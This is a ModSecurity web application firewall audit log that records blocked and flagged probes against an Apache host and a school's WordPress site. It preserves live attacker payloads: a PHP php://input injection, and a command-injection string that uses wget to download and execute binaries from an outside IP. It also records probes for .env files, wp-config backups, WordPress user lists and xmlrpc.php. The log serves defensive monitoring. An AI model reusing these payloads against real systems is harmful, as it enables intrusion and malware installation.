allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746263481762905 4120 (- - -) Stopwatch2: 1746263481762905 4120; combined=2438, p1=469, p2=1940, p3=0, p4=0, p5=29, sr=107, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f65a2b3a-Z-- --e324b94c-A-- [03/May/2025:16:39:43 +0700] aBXkX0SOhfQ6W15Bgg8ETAAAAFU 103.236.140.4 44504 103.236.140.4 8181 --e324b94c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.70.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.70.211 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e324b94c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e324b94c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746265183439396 842 (- - -) Stopwatch2: 1746265183439396 842; combined=377, p1=335, p2=0, p3=0, p4=0, p5=42, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e324b94c-Z-- --c8521726-A-- [03/May/2025:16:40:10 +0700] aBXkekSOhfQ6W15Bgg8ETQAAAFQ 103.236.140.4 44506 103.236.140.4 8181 --c8521726-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --c8521726-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8521726-E-- --c8521726-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746265210181388 2588 (- - -) Stopwatch2: 1746265210181388 2588; combined=861, p1=486, p2=343, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8521726-Z-- --81caa149-A-- [03/May/2025:18:15:38 +0700] aBX62oOgvPi2IO4kz1v0lgAAAIw 103.236.140.4 49854 103.236.140.4 8181 --81caa149-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: TurnitinBot (https://turnitin.com/robot/crawlerinfo.html) --81caa149-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81caa149-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746270938998585 656 (- - -) Stopwatch2: 1746270938998585 656; combined=265, p1=232, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81caa149-Z-- --c3888153-A-- [03/May/2025:20:16:39 +0700] aBYXN8P0ZqGY3Jj2X92WxAAAAA0 103.236.140.4 34320 103.236.140.4 8181 --c3888153-B-- GET /wp-config.php-old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 31.11.36.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.11.36.186 X-Forwarded-Proto: http Connection: close Accept: */* --c3888153-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3888153-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746278199986485 851 (- - -) Stopwatch2: 1746278199986485 851; combined=351, p1=308, p2=0, p3=0, p4=0, p5=43, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3888153-Z-- --823b4b7c-A-- [03/May/2025:20:16:47 +0700] aBYXP8P0ZqGY3Jj2X92WxQAAAAU 103.236.140.4 34322 103.236.140.4 8181 --823b4b7c-B-- GET /wp-config.php_old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 176.62.170.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.62.170.213 X-Forwarded-Proto: http Connection: close Accept: */* --823b4b7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --823b4b7c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746278207125408 806 (- - -) Stopwatch2: 1746278207125408 806; combined=346, p1=307, p2=0, p3=0, p4=0, p5=38, sr=139, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --823b4b7c-Z-- --3d98a405-A-- [03/May/2025:21:57:10 +0700] aBYuxkSOhfQ6W15Bgg8K4QAAAFQ 103.236.140.4 36708 103.236.140.4 8181 --3d98a405-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3d98a405-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d98a405-H-- Message: Access denied with code 403 (phase 2). 
Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746284230984456 2975 (- - -) Stopwatch2: 1746284230984456 2975; combined=1287, p1=454, p2=802, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d98a405-Z-- --bba4c018-A-- [03/May/2025:21:57:14 +0700] aBYuySleQJs6d7wanHHPlAAAANg 103.236.140.4 36712 103.236.140.4 8181 --bba4c018-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bba4c018-C-- demo.sayHello --bba4c018-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bba4c018-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746284233996058 5142 (- - -) Stopwatch2: 1746284233996058 5142; combined=3852, p1=556, p2=3093, p3=22, p4=23, p5=91, sr=151, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bba4c018-Z-- --3c3f1b2b-A-- [03/May/2025:21:57:39 +0700] aBYu44OgvPi2IO4kz1v83wAAAI4 103.236.140.4 36718 103.236.140.4 8181 --3c3f1b2b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3c3f1b2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c3f1b2b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746284259376771 3116 (- - -) Stopwatch2: 1746284259376771 3116; combined=1380, p1=515, p2=830, p3=0, p4=0, p5=35, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c3f1b2b-Z-- --d7deb042-A-- [03/May/2025:21:57:41 +0700] aBYu5YOgvPi2IO4kz1v84QAAAJU 103.236.140.4 36722 103.236.140.4 8181 --d7deb042-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d7deb042-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7deb042-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746284261580158 1985 (- - -) Stopwatch2: 1746284261580158 1985; combined=1029, p1=349, p2=654, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7deb042-Z-- --58147438-A-- [03/May/2025:21:57:42 +0700] aBYu5oOgvPi2IO4kz1v84gAAAJI 103.236.140.4 36724 103.236.140.4 8181 --58147438-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --58147438-C-- demo.sayHello --58147438-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --58147438-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746284262678196 5043 (- - -) Stopwatch2: 1746284262678196 5043; combined=3778, p1=449, p2=3115, p3=24, p4=27, p5=95, sr=68, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58147438-Z-- --1bfca203-A-- [03/May/2025:21:57:44 +0700] aBYu6IOgvPi2IO4kz1v85AAAAJM 103.236.140.4 36730 103.236.140.4 8181 --1bfca203-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1bfca203-C-- demo.sayHello --1bfca203-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1bfca203-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746284264863585 5008 (- - -) Stopwatch2: 1746284264863585 5008; combined=3919, p1=530, p2=3070, p3=23, p4=26, p5=148, sr=158, sw=122, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1bfca203-Z-- --f80d1b56-A-- [03/May/2025:21:59:48 +0700] aBYvZESOhfQ6W15Bgg8K5AAAAFg 103.236.140.4 36748 103.236.140.4 8181 --f80d1b56-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f80d1b56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f80d1b56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746284388338439 2903 (- - -) Stopwatch2: 1746284388338439 2903; combined=1258, p1=440, p2=787, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f80d1b56-Z-- --5772d307-A-- [03/May/2025:21:59:50 +0700] aBYvZoOgvPi2IO4kz1v85wAAAJg 103.236.140.4 36752 103.236.140.4 8181 --5772d307-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5772d307-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5772d307-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746284390782069 2208 (- - -) Stopwatch2: 1746284390782069 2208; combined=1124, p1=406, p2=692, p3=0, p4=0, p5=26, sr=153, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5772d307-Z-- --20baf45d-A-- [03/May/2025:21:59:52 +0700] aBYvaIOgvPi2IO4kz1v86AAAAIY 103.236.140.4 36754 103.236.140.4 8181 --20baf45d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --20baf45d-C-- demo.sayHello --20baf45d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --20baf45d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746284392130153 4704 (- - -) Stopwatch2: 1746284392130153 4704; combined=3769, p1=447, p2=3124, p3=23, p4=26, p5=87, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20baf45d-Z-- --dd754c35-A-- [03/May/2025:21:59:53 +0700] aBYvaYOgvPi2IO4kz1v86QAAAIA 103.236.140.4 36760 103.236.140.4 8181 --dd754c35-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.201 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dd754c35-C-- demo.sayHello --dd754c35-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd754c35-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746284393501499 4667 (- - -) Stopwatch2: 1746284393501499 4667; combined=3597, p1=464, p2=2935, p3=23, p4=23, p5=90, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd754c35-Z-- --3f3ddf39-A-- [03/May/2025:22:00:54 +0700] aBYvpileQJs6d7wanHHPmQAAAMo 103.236.140.4 36766 103.236.140.4 8181 --3f3ddf39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3f3ddf39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f3ddf39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746284454593059 3177 (- - -) Stopwatch2: 1746284454593059 3177; combined=1433, p1=488, p2=912, p3=0, p4=0, p5=32, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f3ddf39-Z-- --eab1c17b-A-- [03/May/2025:22:00:57 +0700] aBYvqSleQJs6d7wanHHPmwAAAMg 103.236.140.4 36770 103.236.140.4 8181 --eab1c17b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.76 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --eab1c17b-C-- demo.sayHello 